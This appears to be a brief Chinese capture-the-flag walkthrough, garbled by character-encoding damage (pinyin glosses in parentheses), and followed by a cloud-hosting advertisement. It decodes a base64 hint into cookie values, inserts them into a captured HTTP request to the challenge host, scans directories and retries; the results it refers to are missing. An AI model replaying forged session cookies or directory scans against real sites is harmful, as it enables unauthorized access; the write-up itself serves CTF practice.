(1)打開(kāi)網(wǎng)頁(yè)鏈接,題目如下
(2)將提示解碼
dXNlcl9sb2dpbj0yMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzsgcGFzc3dvcmQ9NGM
3ODM4NDVkM2E0ODk0ZmFmYTNhMWJmOGE4ZDRlN2U7IGFzZGNhc2M7IFBIUFNFU1NJRD02bzA3Z3E1a2
szOXE2NnI5NmFvMmQ4OWo3MDsgcGF0aD0v]
user_login=21232f297a57a5a743894a0e4a801fc3; password=4c783845d3a4894fafa3a1bf8a8d4e7e; asdcasc; PHPSESSID=6o07gq5kk39q66r96ao2d89j70; path=/
(3)我們看到提示中有path和phpsessid這兩個(gè)值,我們判定這個(gè)為cookie字段的值。于是,我們將其加入獲取的報(bào)文中看是不是可以成功
GET /login.php HTTP/1.1
Host: b73bef3389f1a266.yunyansec.com
Content-Length: 45
Cache-Control: max-age=0
Origin: http://b73bef3389f1a266.yunyansec.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://b73bef3389f1a266.yunyansec.com/index.html
Accept-Language: zh-CN,zh;q=0.9
cookie: user_login=21232f297a57a5a743894a0e4a801fc3; password=4c783845d3a4894fafa3a1bf8a8d4e7e; asdcasc; PHPSESSID=6o07gq5kk39q66r96ao2d89j70; path=/
Connection: close
至此,沒(méi)有什么有價(jià)值的。。。。
(4)開(kāi)始上工具掃目錄
發(fā)現(xiàn)有文件
(5)嘗試鏈接
我們把包抓下來(lái),按剛才的方法,加上cookie
得到了
另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)scvps.cn,海內(nèi)外云服務(wù)器15元起步,三天無(wú)理由+7*72小時(shí)售后在線,公司持有idc許可證,提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國(guó)服務(wù)器、虛擬主機(jī)、免備案服務(wù)器”等云主機(jī)租用服務(wù)以及企業(yè)上云的綜合解決方案,具有“安全穩(wěn)定、簡(jiǎn)單易用、服務(wù)可用性高、性價(jià)比高”等特點(diǎn)與優(yōu)勢(shì),專為企業(yè)上云打造定制,能夠滿足用戶豐富、多元化的應(yīng)用場(chǎng)景需求。